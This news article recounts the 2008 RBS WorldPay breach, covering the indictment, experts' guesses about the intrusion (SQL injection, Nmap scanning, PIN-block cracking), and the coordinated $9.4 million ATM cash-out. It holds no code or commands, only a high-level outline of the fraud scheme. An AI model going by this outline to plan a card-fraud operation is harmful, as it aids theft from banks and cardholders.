The top line from the RBS WorldPay caper reads like a trailer for George Clooney’s next Ocean’s 11 summer blockbuster: An elite Euro-Russian cybergang uses the Internet to remotely crack deep inside the network of a giant U.S. debit- and credit-card processor. The gang swipes and decrypts valuable debit-card account data; and then sets into motion a globe-spanning, multi-million dollar score.
Moving fast to avoid detection, an army of accomplices carrying blank payment cards embedded with stolen debit account numbers hit up 2,100 ATMS in 280 cities in eight countries — in just 12 hours! Total take: a cool $9.4 million.
See related commentary: Why cybercrime is here to stay
In Hollywood, the ring leaders would smugly disband. Not this time, though. The bad guys got caught, thanks to unprecedented collaboration of U.S. and Estonian police, whose leaders bridged a geopolitical/cultural chasm to save the day — but that’s another movie.
What follows is a blow-by-blow account of the RBS WorldPlay caper, based on security experts extrapolating details revealed in the 10Nov2009 indictment of Viktor Pleshchuk, 28, of St. Petersburg, Russia; Sergei Tsurikov, 25, of Tallinn, Estonia; and Oleg Covelin, 28, of Chisinau, Moldova, and a co-defendant identified only as “Hacker 3.”
They and four others were charged with wire fraud, computer fraud and identity theft, as outlined in this indictment and this FBI press release.
The easy part: initial breach
Pleshchuk, Tšurikov, and Covelin gained “unauthorized access” into RBS WorldPay, the Atlanta, GA-based payment processing division of the Royal Bank of Scotland Group. But authorities don’t spell out precisely how they did this.
They certainly did not piggy back onto RBS’s WiFi systems, as hacker Albert Gonzalez did to initially penetrate retailer TJX’s internal network to steal 94 million payment card transactions records. RBS doesn’t use WiFi as a convenience tool that can be hacked by anyone with a cheap antennae, as many giant retail chains do.
According to the indictment, Oleg Covelin, based in Moldova, “learned of the vulnerability in the RBS WorldPay computer network” and provided that intelligence to Tsurikov in Estonia.
This is the second indictment of Covelin in three months. In September, he was one of five eastern European men indicted in New York on Monday as part of an international ID theft ring, known as Western Express Cybercrime Group.
Covelin and Tsurikov rercruited the Russian hacker Pleshchuk and the mysterious Hacker 3 to figure out how best to exploit the security hole. They very well may have used a SQL injection attack on one of RBS’s public facing Web pages. This is a tried-and-trued attack vector, used in the infamous Heartland Payments System breach.
Or they could have hacked into security holes in one of RBS’s mail servers or Web servers — one not current on all of its security patches, says Chris Wysopal, CTO of applications security firm Veracode.
This was the easy part. “Breaching a perimeter is pretty well understood,” says Wysopal.
Scanning for jackpot servers
Once the intruders got inside RBS’s internal network on 04Nov2008, they immediately began looking for jackpot servers. This is fairly simple to do , as well. They probably used Nmap, or some other free port scanning tool, to quickly locate all servers storing Microsoft SQL server data bases.
Locating, accessing and extracting data from SQL databases from inside the “soft, chewy center of corporate networks” is fairly trivial stuff, says Don Jackson, senior researcher at SecureWorks.
Wysopal surmises that the bad guys took their sweet time culling through harvested data, sorting perhaps millions of credit and debit card account numbers. This would seem to suggest that RBS’s intrusion detection systems failed to send up any red flags as a result of the perimeter breach or the internal SQL database breaches. Or if it did, RBS ignored them.
At some point, the ring leaders stumbled upon 44 prepaid payroll debit accounts — 42 issued by Palm Desert National Bank. Companies use such accounts to pay their workers. Each gets a debit card to use to withdraw pay at ATMS; the company deposits salaries at bi-weekly or monthly intervals.
“I don’t think they were targeting any particular accounts,” say Wysopal. “These tend to be crimes of opportunity. They may have been probing all kinds of banking networks, found a way into this one, took a look around at vulnerable systems, found this ATM data, and when down this road.”
Finding and cracking ‘PIN blocks‘
The thieves also needed PINS to make the ATM withdrawals. Elite cyber gangs know that payment processors typically store account PINS in a separate server called a “high security module,” or HSM server. The same port scanning tool, such as Nmap, used to locate SQL databases holding account numbers can be easily tweaked to seek out HSM servers holding PINS, says Wysopal.
“They knew enough there would be a specialized machine, where the PINS would be stored,” says Wysopal. “They knew the PINS would be encrypted and that they’d have to do some research to learn how it worked, and how to decrypt it.”
PIN cracking research isn’t nearly as commonplace as the knowledge base on spamming, phishing and SQL injection. But it is out there on the Internet as a white paper, titled The Unbearable Lightness of PIN Cracking, delivered at Financial Cryptography and Data Security 2007 conference attests.
The members of this cyber gang appear to be brilliant at multi-tasking. While they were working to find and decrypt the needed PINS, they also manipulated the SQL databases holding the account information, raising the limits for ATM withdrawals. “It is not clear how the attackers accessed the SQL server, whether it was a command-line on the server itself, another machine, or perhaps through SQL Injection,” says Wysopal.
Meanwhile, they also readied 44 counterfeit debit cards — each faked card carrying a stolen payroll account number on its magnetic stripe, and organized a global network of “cashers” to use the 44 cards at 2,100 ATMS in 280 cities in the United States, Russia, Ukraine, Estonia, Italy, Hong Kong, Japan and Canada.
All of this – the 44 faked cards with account numbers and PINS and the global network of cashers — were in place, tested and ready to go by Nov. 8. The gang even prepared coding routines to access RBS’s network to monitor the planned withdrawals in real time, and, afterward, destroy data to try to erase their tracks from the system, according to the indictment.
Wave of thievery
The climactic cashout went like clockwork. For 12 hours, the cashers hit ATM after ATM extracting $9.4 million. And then the operation shut down. The indictment gives a few snapshots of this global spanning wave of thievery.
Hacker 3 was responsible for managing the networks of 44 cashers. Each would get to keep 30% to 50 % of the stolen funds, transferring the balance to Hacker 3, who was in charge of distributing shares to the other ring leaders.
The withdrawals, as directed by Hacker 3, followed a strictly coordinated time schedule; Pleshchuk and Tsurikov monitored the ATM’s dishing out cash in real time from inside RBS’s network.
Tsurikov also managed a team of four cashers who hit ATMs in his home country, Estonia. They pulled out $289,000. Estonian police, working closely with the FBI, arrested the entire band. Information from the Estonian arrests led to the identification and arrest of a pair of cashers in Hong Kong.
Uri Rivner, Head of New Technologies, Identity Protection & Verification RSA, The Security Division of EMC, says the gang’s technical prowess was unremarkable. “The technical aspects in this case were not that impressive,” says Rivner. “But the level of coordination was staggering.”
Rivner says Pleshchuk, Tšurikov, Covelin and Hacker 3 likely spent months on private chat channels and Internet forums plotting and recruiting accomplices.
“They cloned 44 cards and gave them to an army of cashiers, that went from ATM to ATM in their local cities,” says Rivner. “So, on average, each cloned card was used in 47 ATMs in six adjacent towns. Managing time zone issues and coordinating cashers in eight nations – all required to hit as many ATMs as possible within 12 hours makes me think of an Al Qaeda like strategy of multiple attacks in a single day.”
“A lot of planning and a very high degree of international cooperation went into this scam.”